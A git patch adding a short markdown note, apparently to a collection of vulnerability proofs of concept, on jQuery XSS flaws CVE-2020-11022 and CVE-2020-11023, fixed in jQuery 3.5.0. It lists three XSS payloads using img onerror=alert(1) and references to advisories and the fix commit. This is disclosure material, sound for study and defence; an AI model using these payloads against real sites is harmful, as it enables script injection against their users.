From 4cbfec9b75aafe3714109aa692f764b85d8c6492 Mon Sep 17 00:00:00 2001
From: r0eXpeR <46040186+r0eXpeR@users.noreply.github.com>
Date: Fri, 15 Jan 2021 10:15:43 +0800
Subject: [PATCH] Add files via upload

---
 ...5.0 XSS (CVE-2020-11022-CVE-2020-11023).md | 25 +++++++++++++++++++
 1 file changed, 25 insertions(+)
 create mode 100644 jQuery >=1.0.3 <3.5.0 XSS (CVE-2020-11022-CVE-2020-11023).md

diff --git a/jQuery >=1.0.3 <3.5.0 XSS (CVE-2020-11022-CVE-2020-11023).md b/jQuery >=1.0.3 <3.5.0 XSS (CVE-2020-11022-CVE-2020-11023).md
new file mode 100644
index 0000000..4995e98
--- /dev/null
+++ b/jQuery >=1.0.3 <3.5.0 XSS (CVE-2020-11022-CVE-2020-11023).md	
@@ -0,0 +1,25 @@
+# jQuery >=1.0.3 <3.5.0 XSS (CVE-2020-11022/CVE-2020-11023)
+
+此漏洞已在jQuery 3.5.0中修复。
+
+PoC：
+
+```
+PoC 1.
+<style><style /><img src=x onerror=alert(1)> 
+PoC 2. (Only jQuery 3.x affected)
+<img alt="<x" title="/><img src=x onerror=alert(1)>">
+PoC 3.
+<option><style></option></select><img src=x onerror=alert(1)></style>
+```
+
+jQuery XSS Examples：
+
+https://vulnerabledoma.in/jquery_htmlPrefilter_xss.html
+
+ref：
+
+* https://snyk.io/vuln/SNYK-JS-JQUERY-565129
+* https://github.com/jquery/jquery/commit/1d61fd9407e6fbe82fe55cb0b938307aa0791f77
+* https://mksben.l0.cm/2020/05/jquery3.5.0-xss.html
+* https://forum.ywhack.com/thread-114981-1-1.html
\ No newline at end of file